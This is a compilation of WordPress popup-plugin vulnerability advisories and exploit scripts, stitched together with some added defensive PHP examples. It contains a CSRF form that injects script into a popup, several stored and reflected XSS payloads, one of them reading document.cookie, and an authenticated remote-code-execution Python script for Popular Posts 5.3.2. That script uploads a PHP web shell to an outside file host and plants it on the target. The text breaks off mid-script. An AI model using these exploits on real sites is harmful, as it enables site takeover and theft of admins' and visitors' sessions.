<!--
Source: https://sumofpwn.nl/advisory/2016/popup_by_supsystic_wordpress_plugin_vulnerable_to_cross_site_request_forgery.html
Abstract
A Cross-Site Request Forgery vulnerability exists in the Popup by Supsystic WordPress plugin. This vulnerability allows attackers to add and modify scripting code that will target authenticated WordPress admins or visitors that see the popup generated by this plugin. Before exploitation of this issue succeeds, and scripting code is therefore injected, a victim WordPress admin must click a specially crafted link or visit a malicious attacker-controlled webpage.
Contact
For feedback or questions about this advisory mail us at sumofpwn at securify.nl
The Summer of Pwnage
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. It is a community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
OVE ID
OVE-20160724-0013
Tested versions
This issue was successfully tested on the Popup by Supsystic WordPress plugin version 1.7.6.
Fix
There is currently no fix available.
Introduction
The aim of the Popup by Supsystic WordPress plugin is to help you get more newsletter subscribers, promote new products, deliver special offers and to get more social followers.
A Cross-Site Request Forgery vulnerability exists in the Popup by Supsystic WordPress plugin. This vulnerability allows attackers to add and modify scripting code that will target authenticated admins or visitors that see the popup generated by this plugin. In order to exploit this issue the target user must click a specially crafted link or visit a malicious website (or advertisement).
Details
This issue exists because Popup by Supsystic lacks protection against Cross-Site Request Forgery attacks. The following proof of concept code demonstrates this issue:
-->
<html>
<body>
<form action="http://<target>/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="params[main][show_on]" value="page_load" />
<input type="hidden" name="params[main][show_on_page_load_delay]" value="" />
<input type="hidden" name="ppsCopyTextCode" value="[supsystic-show-popup id=100]" />
<input type="hidden" name="ppsCopyTextCode" value="onclick="ppsShowPopup(100); return false;"" />
<input type="hidden" name="ppsCopyTextCode" value="#ppsShowPopUp_100" />
<input type="hidden" name="params[main][show_on_click_on_el_delay]" value="0" />
<input type="hidden" name="params[main][show_on_scroll_window_delay]" value="0" />
<input type="hidden" name="params[main][show_on_scroll_window_perc_scroll]" value="0" />
<input type="hidden" name="ppsCopyTextCode" value="#ppsShowPopUp_100" />
<input type="hidden" name="params[main][show_on_link_follow_delay]" value="0" />
<input type="hidden" name="ppsCopyTextCode" value="[supsystic-popup-content id=100]" />
<input type="hidden" name="params[main][close_on]" value="user_close" />
<input type="hidden" name="params[main][show_pages]" value="all" />
<input type="hidden" name="params[main][show_time_from]" value="12:00am" />
<input type="hidden" name="params[main][show_time_to]" value="12:00am" />
<input type="hidden" name="params[main][show_date_from]" value="" />
<input type="hidden" name="params[main][show_date_to]" value="" />
<input type="hidden" name="params[main][show_to]" value="everyone" />
<input type="hidden" name="params[main][show_to_first_time_visit_days]" value="30" />
<input type="hidden" name="params[main][show_to_until_make_action_days]" value="30" />
<input type="hidden" name="params[main][count_times_num]" value="1" />
<input type="hidden" name="params[main][count_times_mes]" value="day" />
<input type="hidden" name="params[main][hide_for_devices_show]" value="0" />
<input type="hidden" name="params[main][hide_for_post_types_show]" value="0" />
<input type="hidden" name="params[main][hide_for_ips_show]" value="0" />
<input type="hidden" name="params[main][hide_for_ips]" value="" />
<input type="hidden" name="params[main][hide_for_countries_show]" value="0" />
<input type="hidden" name="params[main][hide_for_languages_show]" value="0" />
<input type="hidden" name="params[main][hide_search_engines_show]" value="0" />
<input type="hidden" name="params[main][hide_preg_url_show]" value="0" />
<input type="hidden" name="params[main][hide_preg_url]" value="" />
<input type="hidden" name="params[main][hide_for_user_roles_show]" value="0" />
<input type="hidden" name="params[tpl][width]" value="400" />
<input type="hidden" name="params[tpl][width_measure]" value="px" />
<input type="hidden" name="params[tpl][bg_overlay_opacity]" value="0.5" />
<input type="hidden" name="params[tpl][bg_type_0]" value="color" />
<input type="hidden" name="params[tpl][bg_img_0]" value="" />
<input type="hidden" name="params[tpl][bg_color_0]" value="#8c7764" />
<input type="hidden" name="params[tpl][bg_type_1]" value="color" />
<input type="hidden" name="params[tpl][bg_img_1]" value="" />
<input type="hidden" name="params[tpl][bg_color_1]" value="#75362c" />
<input type="hidden" name="params[tpl][font_label]" value="default" />
<input type="hidden" name="params[tpl][label_font_color]" value="#ffffff" />
<input type="hidden" name="params[tpl][font_txt_0]" value="default" />
<input type="hidden" name="params[tpl][text_font_color_0]" value="#f9e6ce" />
<input type="hidden" name="params[tpl][font_footer]" value="default" />
<input type="hidden" name="params[tpl][footer_font_color]" value="#585858" />
<input type="hidden" name="params[tpl][responsive_mode]" value="def" />
<input type="hidden" name="params[tpl][reidrect_on_close]" value="" />
<input type="hidden" name="params[tpl][close_btn]" value="while_close" />
<input type="hidden" name="params[tpl][bullets]" value="lists_green" />
<input type="hidden" name="layered_style_promo" value="1" />
<input type="hidden" name="params[tpl][layered_pos]" value="" />
<input type="hidden" name="params[tpl][enb_label]" value="1" />
<input type="hidden" name="params[tpl][label]" value="SIGN UP<br> to our Newsletter!" />
<input type="hidden" name="params[tpl][enb_txt_0]" value="1" />
<input type="hidden" name="params_tpl_txt_0" value="<p>Popup by Supsystic lets you easily create elegant overlapping windows with unlimited features. Pop-ups with Slider, Lightbox, Contact and Subscription forms and more</p>" />
<input type="hidden" name="params[tpl][foot_note]" value="We respect your privacy. Your information will not be shared with any third party and you can unsubscribe at any time " />
<input type="hidden" name="params[tpl][enb_sm_facebook]" value="1" />
<input type="hidden" name="params[tpl][enb_sm_googleplus]" value="1" />
<input type="hidden" name="params[tpl][enb_sm_twitter]" value="1" />
<input type="hidden" name="params[tpl][sm_design]" value="boxy" />
<input type="hidden" name="params[tpl][anim_key]" value="none" />
<input type="hidden" name="params[tpl][anim_duration]" value="" />
<input type="hidden" name="params[tpl][enb_subscribe]" value="1" />
<input type="hidden" name="params[tpl][sub_dest]" value="wordpress" />
<input type="hidden" name="params[tpl][sub_wp_create_user_role]" value="subscriber" />
<input type="hidden" name="params[tpl][sub_aweber_listname]" value="" />
<input type="hidden" name="params[tpl][sub_aweber_adtracking]" value="" />
<input type="hidden" name="params[tpl][sub_mailchimp_api_key]" value="" />
<input type="hidden" name="params[tpl][sub_mailchimp_groups_full]" value="" />
<input type="hidden" name="test_email" value="canzihazcandy@gmail.com" />
<input type="hidden" name="params[tpl][sub_fields][name][enb]" value="1" />
<input type="hidden" name="params[tpl][sub_fields][name][name]" value="name" />
<input type="hidden" name="params[tpl][sub_fields][name][html]" value="text" />
<input type="hidden" name="params[tpl][sub_fields][name][label]" value="Name" />
<input type="hidden" name="params[tpl][sub_fields][name][value]" value="" />
<input type="hidden" name="params[tpl][sub_fields][name][custom]" value="0" />
<input type="hidden" name="params[tpl][sub_fields][name][mandatory]" value="0" />
<input type="hidden" name="params[tpl][sub_fields][email][name]" value="email" />
<input type="hidden" name="params[tpl][sub_fields][email][html]" value="text" />
<input type="hidden" name="params[tpl][sub_fields][email][label]" value="E-Mail" />
<input type="hidden" name="params[tpl][sub_fields][email][value]" value="" />
<input type="hidden" name="params[tpl][sub_fields][email][custom]" value="0" />
<input type="hidden" name="params[tpl][sub_fields][email][mandatory]" value="1" />
<input type="hidden" name="params[tpl][sub_fields][email][enb]" value="1" />
<input type="hidden" name="params[tpl][sub_txt_confirm_sent]" value="Confirmation link was sent to your email address. Check your email!" />
<input type="hidden" name="params[tpl][sub_txt_success]" value="Thank you for subscribe!" />
<input type="hidden" name="params[tpl][sub_txt_invalid_email]" value="Empty or invalid email" />
<input type="hidden" name="params[tpl][sub_txt_exists_email]" value="Empty or invalid email" />
<input type="hidden" name="params[tpl][sub_redirect_url]" value="" />
<input type="hidden" name="params[tpl][sub_txt_confirm_mail_subject]" value="Confirm subscription on [sitename]" />
<input type="hidden" name="params[tpl][sub_txt_confirm_mail_from]" value="admin@mail.com" />
<input type="hidden" name="params[tpl][sub_txt_confirm_mail_message]" value="You subscribed on site <a href="[siteurl]">[sitename]</a>. Follow <a href="[confirm_link]">this link</a> to complete your subscription. If you did not subscribe here - just ignore this message." />
<input type="hidden" name="params[tpl][sub_txt_subscriber_mail_subject]" value="[sitename] Your username and password" />
<input type="hidden" name="params[tpl][sub_txt_subscriber_mail_from]" value="admin@mail.com" />
<input type="hidden" name="params[tpl][sub_txt_subscriber_mail_message]" value="Username: [user_login]<br />Password: [password]<br />[login_url]" />
<input type="hidden" name="params[tpl][sub_redirect_email_exists]" value="" />
<input type="hidden" name="params[tpl][sub_btn_label]" value="SIGN UP" />
<input type="hidden" name="params[tpl][sub_new_email]" value="admin&@mail.com" />
<input type="hidden" name="params[tpl][sub_new_subject]" value="New Subscriber on Summer of Pwnage" />
<input type="hidden" name="params[tpl][sub_new_message]" value="You have new subscriber on your site <a href="[siteurl]">[sitename]</a>, here us subscriber information:<br />[subscriber_data]" />
<input type="hidden" name="stat_from_txt" value="" />
<input type="hidden" name="stat_to_txt" value="" />
<input type="hidden" name="css" value="" />
<input type="hidden" name="html" value="<link rel="stylesheet" type="text/css" href="//fonts.googleapis.com/css?family=Amatic+SC" /> <script>alert("xss")</script> <div id="ppsPopupShell_[ID]" class="ppsPopupShell ppsPopupListsShell"> <a href="#" class="ppsPopupClose ppsPopupClose_[close_btn]"></a> <div class="ppsInnerTblContent"> <div class="ppsPopupListsInner ppsPopupInner"> [if enb_label] <div class="ppsPopupLabel ppsPopupListsLabel">[label]</div> [endif] <div style="clear: both;"></div> [if enb_txt_0] <div class="ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0"> [txt_0] </div> [endif] [if enb_subscribe] <div class="ppsSubscribeShell"> [sub_form_start] [sub_fields_html] <input type="submit" name="submit" value="[sub_btn_label]" /> [sub_form_end] <div style="clear: both;"></div> </div> [endif] <div style="clear: both;"></div> <div class="ppsRightCol"> [if enb_sm] <div style="clear: both;"></div> <div class="ppsSm"> [sm_html] </div> [endif] [if enb_foot_note] <div class="ppsFootNote"> [foot_note] </div> [endif] </div> </div> </div> </div> " />
<input type="hidden" name="params[opts_attrs][bg_number]" value="2" />
<input type="hidden" name="params[opts_attrs][txt_block_number]" value="1" />
<input type="hidden" name="mod" value="popup" />
<input type="hidden" name="action" value="save" />
<input type="hidden" name="id" value="100" />
<input type="hidden" name="params_tpl_txt_val_0" value="<p>Popup by Supsystic lets you easily create elegant overlapping windows with unlimited features. Pop-ups with Slider, Lightbox, Contact and Subscription forms and more</p>" />
<input type="hidden" name="pl" value="pps" />
<input type="hidden" name="reqType" value="ajax" />
<input type="submit"/>
</form>
</body>
</html>
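The PoC above works because the save action behind admin-ajax.php accepts any POST that arrives with the admin's cookies. The handler below is an added example (not Popup by Supsystic code; the hook name, option key and the allow-list of show_on values are assumed) showing the three checks that close that gap: capability, nonce, and input filtering.

```php
<?php
/**
 * Added example, not Popup by Supsystic code. The hook name, the option key
 * and the allow-list of show_on values are assumed for illustration.
 * Requires WordPress (check_ajax_referer, wp_kses_post, wp_nonce_field).
 */

add_action( 'wp_ajax_example_popup_save', 'example_popup_save' );

function example_popup_save() {
    // Layer 1: only users who may manage options can save a popup at all.
    // A forged request riding on a Subscriber's session stops here.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'insufficient privileges' ), 403 );
    }

    // Layer 2: the request must carry a nonce minted for this action and this
    // user. A cross-site form cannot read the admin page, so it cannot obtain
    // one. Passing false as the third argument returns instead of die(-1),
    // so we can answer with a JSON error.
    if ( ! check_ajax_referer( 'example_popup_save', '_ajax_nonce', false ) ) {
        wp_send_json_error( array( 'message' => 'missing or invalid nonce' ), 403 );
    }

    // Layer 3: treat every field as untrusted even after the checks above.
    $id   = isset( $_POST['id'] ) ? absint( $_POST['id'] ) : 0;
    $main = isset( $_POST['params']['main'] ) && is_array( $_POST['params']['main'] )
        ? wp_unslash( $_POST['params']['main'] )
        : array();
    $show_on = isset( $main['show_on'] ) ? sanitize_key( $main['show_on'] ) : 'page_load';

    // Enumerated settings are matched against an allow-list (values assumed
    // from the parameter names in the PoC: show_on_page_load_delay etc.).
    $allowed_show_on = array( 'page_load', 'click_on_el', 'scroll_window', 'link_follow' );
    if ( ! in_array( $show_on, $allowed_show_on, true ) ) {
        wp_send_json_error( array( 'message' => 'unknown show_on value' ), 400 );
    }

    // The popup template is stored HTML that is later rendered to every
    // visitor. wp_kses_post() drops <script>, on* handlers and javascript:
    // URLs, so the <script>alert("xss")</script> in the PoC is never persisted.
    $html = isset( $_POST['html'] ) ? wp_kses_post( wp_unslash( $_POST['html'] ) ) : '';

    if ( 0 === $id ) {
        wp_send_json_error( array( 'message' => 'invalid popup id' ), 400 );
    }

    update_option( 'example_popup_' . $id, array(
        'show_on' => $show_on,
        'html'    => $html,
    ) );

    wp_send_json_success( array( 'id' => $id ) );
}

/**
 * The legitimate admin form must embed the nonce the handler checks.
 * wp_nonce_field() emits <input type="hidden" name="_ajax_nonce" value="...">
 * bound to the current user's session; an attacker's page cannot produce it.
 */
function example_popup_admin_form( $id ) {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-ajax.php' ) ); ?>">
        <input type="hidden" name="action" value="example_popup_save" />
        <input type="hidden" name="id" value="<?php echo esc_attr( (int) $id ); ?>" />
        <?php wp_nonce_field( 'example_popup_save', '_ajax_nonce' ); ?>
        <textarea name="html"></textarea>
        <input type="submit" value="Save" />
    </form>
    <?php
}
```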
# Exploit Title: WordPress Plugin Popup Builder 3.69.6 - Multiple Stored Cross Site Scripting
# Date: 11/27/2020
# Exploit Author: Ilca Lucian Florin
# Vendor Homepage: https://sygnoos.com
# Software Link: https://wordpress.org/plugins/popup-builder/ / https://popup-builder.com/
# Version: <= 3.69.6
# Tested on: Latest Version of Desktop Web Browsers: Chrome, Firefox, Microsoft Edge
The Popup Builder – Responsive WordPress Pop up – Subscription & Newsletter
Plugin is vulnerable to stored cross site scripting. There are multiple
parameters vulnerable to cross site scripting.
All versions up to 3.69.6 are vulnerable to stored cross site scripting.
More information about this plugin could be found on the following links:
1. https://wordpress.org/plugins/popup-builder/
2. https://popup-builder.com/
Cross site scripting (XSS) is a common attack vector that injects malicious
code into a vulnerable web application. XSS differs from other web attack
vectors (e.g., SQL injections), in that it does not directly target the
application itself. Instead, the users of the web application are the ones
at risk. A successful cross site scripting attack can have devastating
consequences for an online business’s reputation and its relationship with
its clients. Stored XSS, also known as persistent XSS, is the more damaging
of the two. It occurs when a malicious script is injected directly into a
vulnerable web application.
# How to reproduce #
1. Login as Editor or Administrator: https://website.com/wp-login/
2. Go to the following link:
https://website.com/wp-admin/edit.php?post_type=popupbuilder or search for
PopUp Builder and select or create new PopUp.
3. Click edit
4. Search and find: # Custom JS or CSS
5. On JS -> Opening events section, add two payloads, one for #2 section
and one for #3 section, like in the following example:
#2 Add the code you want to run before the popup opens. This will be the
code that will work in the process of opening the popup. true/false
conditions will not work in this phase.
<textarea class="wp-editor-area editor-content" data-attr-event="WillOpen"
placeholder=" #... type your code" mode="text/javascript"
name="sgpb-WillOpen">"><script
src="data:;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="></script></textarea>
#3 Add the code you want to run after the popup opens. This code will work
when the popup is already open on the page.
<textarea class="wp-editor-area editor-content" data-attr-event="DidOpen"
placeholder=" #... type your code" mode="text/javascript"
name="sgpb-DidOpen">"><script
src="data:;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="></script></textarea>
6. Click Update
7. Go to https://website.com. The XSS alert will pop up.
# All text-areas from JS section are vulnerable to stored cross site
scripting.
Evidence:
1. https://ibb.co/JvBTq0H
2. https://ibb.co/0KP7NFQ
3. https://ibb.co/3cFnVYF
# Exploit Title: Wordpress Popup Builder 3.49 - Persistent Cross-Site Scripting
# Google Dork: inurl:"\wp-content\plugins\popupbuilder"
# Date: 2019-06-13
# Exploit Author: Unk9vvN
# Vendor Homepage: https://popup-builder.com/
# Software Link: https://wordpress.org/plugins/popup-builder/
# Version: 3.49
# Tested on: Kali Linux
# CVE: N/A
# Description
# This vulnerability is in the validation mode and is located in "Add Post" or "Add Page" of WordPress, and the vulnerability type is stored. After installing Popup Builder, it will make a section in Add Post and Add Page. In this section you will choose which popup to show; it will create an option tag with the value of the title of the popups. Now it's easy: we just break the option tag and insert our script tag inside the popup title.
1. Go to the 'Add new' section of Popup Builder
2. Select Image type
3. Enter the payload in the "add Title"
4. Click the "Publish" option
5. Go to Add New of Page section or Add New of Post section
6. Your payload will run
# URI: http://localhost/wordpress/wp-admin/post-new.php?post_type=popupbuilder&sgpb_type=image&wp-post-new-reload=true
# Parameter & Payload: post_title="/><script>alert("Unk9vvN")</script>
#
# POC
#
POST /wordpress/wp-admin/post.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/post.php?post=39&action=edit
Content-Type: application/x-www-form-urlencoded
Content-Length: 2425
Cookie: ......
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
_wpnonce=8dde4c5262&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D39%26action%3Dedit%26message%3D1&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=popupbuilder&original_post_status=publish&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D39%26action%3Dedit&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D39%26action%3Dedit&post_ID=39&meta-box-order-nonce=5e054a06d1&closedpostboxesnonce=03e898cf80&post_title=%22%2F%3E%3Cscript%3Ealert%28%22Unk9vvN%22%29%3C%2Fscript%3E&samplepermalinknonce=fc4f7ec2ab&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=09&jj=13&aa=2019&hh=15&mn=01&ss=34&hidden_mm=09&cur_mm=09&hidden_jj=13&cur_jj=13&hidden_aa=2019&cur_aa=2019&hidden_hh=15&cur_hh=15&hidden_mn=01&cur_mn=03&original_publish=Update&save=Update&tax_input%5Bpopup-categories%5D%5B%5D=0&newpopup-categories=New+Category+Name&newpopup-categories_parent=-1&_ajax_nonce-add-popup-categories=11ba2a6f5c&sgpb-image-url=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-content%2Fuploads%2F2019%2F09%2Fwp2601087.jpg&sgpb-target%5B0%5D%5B0%5D%5Bparam%5D=not_rule&sgpb-type=image&sgpb-is-preview=0&sgpb-is-active=checked&sgpb-events%5B0%5D%5B0%5D%5Bparam%5D=load&sgpb-events%5B0%5D%5B0%5D%5Bvalue%5D=&sgpb-behavior-after-special-events%5B0%5D%5B0%5D%5Bparam%5D=select_event&sgpb-popup-z-index=9999&sgpb-popup-themes=sgpb-theme-1&sgpb-overlay-custom-class=sgpb-popup-overlay&sgpb-overlay-color=&sgpb-overlay-opacity=0.8&sgpb-content-custom-class=sg-popup-content&sgpb-esc-key=on&sgpb-enable-close-button=on&sgpb-close-button-delay=0&sgpb-close-button-position=bottomRight&sgpb-button-position-top=&sgpb-button-position-right=9&sgpb-button-position-bottom=9&sgpb-button-position-left=&sgpb-button-image=&sgpb-button-image-width=21&sgpb-button-image-height=21&sgpb-border-color=%23000000&sgpb-border-radius=0&sgpb-border-radius-type=%25&sgpb-button-text=Close&sgpb-overlay-click=on&sgpb-popup-dimension-mode=responsiveMode&sgpb-responsive-dimension-measure=auto&sgpb-width=640px&sgpb-height=480px&sgpb-max-width=&sgpb-max-height=&sgpb-min-width=120&sgpb-min-height=&sgpb-open-animation-effect=No+effect&sgpb-close-animation-effect=No+effect&sgpb-enable-content-scrolling=on&sgpb-popup-order=0&sgpb-popup-delay=0&post_name=scriptalert1script
# Exploit Title: WordPress Plugin Popup Anything 2.0.3 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Date: 03/11/2021
# Exploit Author: Luca Schembri
# Vendor Homepage: https://www.essentialplugin.com/
# Software Link: https://wordpress.org/plugins/popup-anything-on-click/
# Version: < 2.0.4
** Summary **
A low-privileged user can perform stored XSS attacks.
** Plugin description **
Popup Anything is the best popup builder and marketing plugin that
helps you get more email subscribers, increase sales and grow your
business.
Manage powerful modal popup for your WordPress blog or website. You
can add an unlimited popup with your configurations.
** Vulnerable page **
http://{WEBSITE}/wp-admin/post.php?post={ID}&action=edit
** PoC **
Go to the "Popup Anything - Settings" tab and select "Simple Link" as
"Link Type". Select "Link Test" and use this payload:
test" onclick="alert(1)
Save the popup and reload the page. Now click on "Link Text" and it
will execute the JavaScript code.
The same attack can be exploited with "Button Text" and "Popup width" fields.
** Remediation **
Upgrade to version 2.0.4 or later.
# Exploit Title: WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)
# Date: 3/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/popup-by-supsystic/
# Version: 1.10.4
# Tested on: Windows 10
# CVE: CVE-2021-24275
1. Description:
The plugin did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
2. Proof of Concept:
/wp-admin/admin.php?page=popup-wp-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
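The four XSS advisories above (Popup Builder 3.69.6 and 3.49, Popup Anything, Popup by Supsystic 1.10.4) are one bug in four output contexts: a stored or request-supplied string is printed where a quote or angle bracket ends the construct it sits in. The block below is an added example, not code from any of those plugins; function names, option keys and the tab list are assumed, and it requires WordPress for the esc_* helpers.

```php
<?php
/**
 * Added example, not code from any plugin named above. Function names, option
 * keys and the tab list are assumed. Requires WordPress (esc_* helpers).
 * Escaping is chosen for the exact output context and applied at output time.
 */

// Context 1: textarea content (Popup Builder 3.69.6, sgpb-WillOpen/DidOpen).
// esc_textarea() encodes <, >, & and " so a saved "><script ...> is shown as
// literal text; the attribute carrying the event name is escaped separately.
function example_render_custom_js_field( $event, $stored_code ) {
    return sprintf(
        '<textarea class="wp-editor-area editor-content" data-attr-event="%1$s" name="sgpb-%1$s">%2$s</textarea>',
        esc_attr( $event ),
        esc_textarea( $stored_code )
    );
}

// Context 2: <option> label (Popup Builder 3.49, popup titles in a <select>).
// The value attribute and the visible text are two contexts; a title such as
// "/><script>alert(1)</script> is inert once esc_html() has encoded it.
function example_render_popup_select( array $popups ) {
    $out = '<select name="example_popup">';
    foreach ( $popups as $post_id => $title ) {
        $out .= sprintf( '<option value="%d">%s</option>', (int) $post_id, esc_html( $title ) );
    }
    return $out . '</select>';
}

// Context 3: attribute value (Popup Anything "Link Text" / "Button Text").
// test" onclick="alert(1) cannot close the attribute once " is &quot;.
function example_render_trigger_link( $link_text ) {
    return sprintf(
        '<a href="#" class="example-popup-trigger" title="%s">%s</a>',
        esc_attr( $link_text ),
        esc_html( $link_text )
    );
}

// Context 4: request parameter reflected into an attribute (Popup by Supsystic
// 1.10.4, the tab parameter). A tab name is an enum, so it is allow-listed
// before it is escaped: anything unknown falls back to the default tab.
function example_current_tab( $requested, array $valid_tabs, $default ) {
    $tab = sanitize_key( (string) $requested );
    return in_array( $tab, $valid_tabs, true ) ? $tab : $default;
}

function example_render_tab_link( $tab, $current ) {
    return sprintf(
        '<a href="%s" class="nav-tab%s">%s</a>',
        esc_url( add_query_arg( 'tab', $tab ) ),
        $tab === $current ? ' nav-tab-active' : '',
        esc_html( ucfirst( $tab ) )
    );
}

// Saving, not just rendering: a field whose purpose is to hold JavaScript
// (the Custom JS section) should be writable only by users WordPress already
// trusts with raw markup. Administrators and Editors have unfiltered_html on
// single-site installs, only super admins have it on multisite, Authors and
// below never do, and the DISALLOW_UNFILTERED_HTML constant removes it from everyone.
function example_save_custom_js( $event, $code ) {
    if ( ! current_user_can( 'unfiltered_html' ) ) {
        return new WP_Error( 'forbidden', 'custom JavaScript requires unfiltered_html' );
    }
    update_option( 'example_popup_js_' . sanitize_key( $event ), wp_unslash( $code ) );
    return true;
}

// Settings page callback (assumed hook) tying the pieces together;
// $_GET['tab'] is never echoed directly.
function example_settings_page() {
    $tabs = array( 'main', 'style', 'statistics' );
    $tab  = example_current_tab( isset( $_GET['tab'] ) ? wp_unslash( $_GET['tab'] ) : '', $tabs, 'main' );

    echo '<h2 class="nav-tab-wrapper">';
    foreach ( $tabs as $t ) {
        echo example_render_tab_link( $t, $tab );
    }
    echo '</h2>';

    echo example_render_custom_js_field( 'WillOpen', get_option( 'example_popup_js_willopen', '' ) );
}
```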
# Exploit Title: WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)
# Date: 15/07/2021
# Exploit Author: Simone Cristofaro
# Vendor Homepage: https://it.wordpress.org/plugins/wordpress-popular-posts/
# Software Link: https://downloads.wordpress.org/plugin/wordpress-popular-posts.5.3.2.zip
# Version: 5.3.2 or below
# Tested on: Debian 10, WordPress 5.7.2, PHP version 7.3.27
# CVE: CVE-2021-42362
# Reference: https://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/
# Notes: It's required that the Popular Posts widget is active (ie. in the footer section) and gd extension for PHP is
# enabled (otherwise WPP can't generate thumbnails). Also, the authenticated user must have "Contributor" role or above.
# This script will login with the provided credentials, create a new post and add a custom field with the link to a
# web shell, that will be automatically downloaded by the server. If you don't want to upload the file, you need to
# provide a URL to a web shell with SSL support (https) and make sure it contains the file name in it. If the plugin is
# set to show a fixed number of popular posts (ie. top 5), you just need to refresh the post page to make it go up ;)
'''
Banner:
'''
banner = """
* Wordpress Popular Posts plugin <= 5.3.2 - RCE (Authenticated)
* @Heisenberg
"""
print(banner)
'''
Import required modules:
'''
import requests
import argparse
import json
import re
'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='Wordpress Popular Posts plugin <= 5.3.2 - RCE (Authenticated)')
my_parser.add_argument('-t', help='--Target IP', metavar='IP', type=str, required=True, dest="target_ip")
my_parser.add_argument('-p', help='--Target port', type=str, metavar='PORT', default='80', dest="target_port")
my_parser.add_argument('-w', help='--Wordpress path (ie. /wordpress/)',metavar='PATH', type=str, required=True, dest="wp_path")
my_parser.add_argument('-U', help='--Username', metavar='USER', type=str, required=True, dest="username")
my_parser.add_argument('-P', help='--Password', metavar='PASS', type=str, required=True, dest="password")
args = my_parser.parse_args()
target_ip = args.target_ip
target_port = args.target_port
wp_path = args.wp_path
username = args.username
password = args.password
'''
# Hard coded parameters (if you don't like command line execution)
target_ip = "localhost"
target_port = "80"
wp_path = "/wordpress/"
username = "heisenberg"
password = "heisenberg"
'''
shell_name = 'exploit.gif.php'
payload = 'GIF <html> <body> <form method="GET" name="<?php echo basename($_SERVER[\'PHP_SELF\']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET[\'cmd\'])) { system($_GET[\'cmd\']); } ?> </pre> </body> </html>'
print('')
print('[*] Starting Exploit:')
'''
Upload file
'''
file_json = requests.post('https://api.bayfiles.com/upload', files={ 'file' : (shell_name, payload)})
resp = json.loads(file_json.text)
if resp['status']:
    urlshort = resp['data']['file']['url']['full']
else:
    print(f'[-] Error:'+ resp['error']['message'])
    exit()
file_uploaded_site = requests.get(urlshort).text
PHP_URL = re.findall(r"(https?://\S+)("+shell_name+")",file_uploaded_site)[0][0] + shell_name
print(f'[+] Web Shell successfully uploaded at [{PHP_URL}].')
'''
Authentication:
'''
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
# Header:
header = {
'Host': target_ip,
'User-Agent': 'Monies Browser 1.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://' + target_ip,
'Connection': 'close',
'Upgrade-Insecure-Requests': '1'
}
# Body:
body = {
'log': username,
'pwd': password,
'wp-submit': 'Log In',
'testcookie': '1'
}
# Authenticate:
auth = session.post(auth_url, headers=header, data=body)
auth_header = auth.headers['Set-Cookie']
if 'wordpress_logged_in' in auth_header:
    print(f'[+] Authentication successful as user [{username}] !')
else:
    print('[-] Authentication failed ! Check username and password')
    exit()
'''
Verify that the requirements are installed
'''
settings_page_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/options-general.php?page=wordpress-popular-posts&tab=debug'
settings_page = session.get(settings_page_url).text
search_string = ' gd'
if settings_page.find(search_string) == -1 :
    print('[-] Error, gd extension for PHP is not installed/enabled on the server ! WPP can\'t generate thumbnails.')
    exit()
'''
Get the wpp-admin-token
'''
settings_page_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/options-general.php?page=wordpress-popular-posts&tab=tools'
settings_page = session.get(settings_page_url).text
search_string = '<input type="hidden" id="wpp-admin-token" name="wpp-admin-token" value="'
search_string_end = '" />'
settings_page = settings_page[settings_page.find(search_string):]
wpp_admin_token = settings_page[72: settings_page.find(search_string_end)]
if wpp_admin_token:
    print(f'[+] Acquired wpp-admin-token [{wpp_admin_token}].')
else:
    print('[-] Error while gathering wpp-admin-token !')
    exit()
'''
Apply changes to the Popular Posts plugin
'''
body = {
'upload_thumb_src': '',
'thumb_source': 'custom_field',
'thumb_lazy_load': 1,
'thumb_field': 'wpp_thumbnail',
'thumb_field_resize': 1,
'section': 'thumb',
'wpp-admin-token': wpp_admin_token
}
applied_changes = session.post(settings_page_url, headers=header, data=body).text
if applied_changes.find('<div class="notice notice-success is-dismissible"><p><strong>Settings saved.'):
    print(f'[+] Settings applied successfully to the Popular Posts plugin. ')
else:
    print('[-] Error while applying settings to the Popular Posts plugin!')
    exit()
'''
Empty image cache
'''
body = {
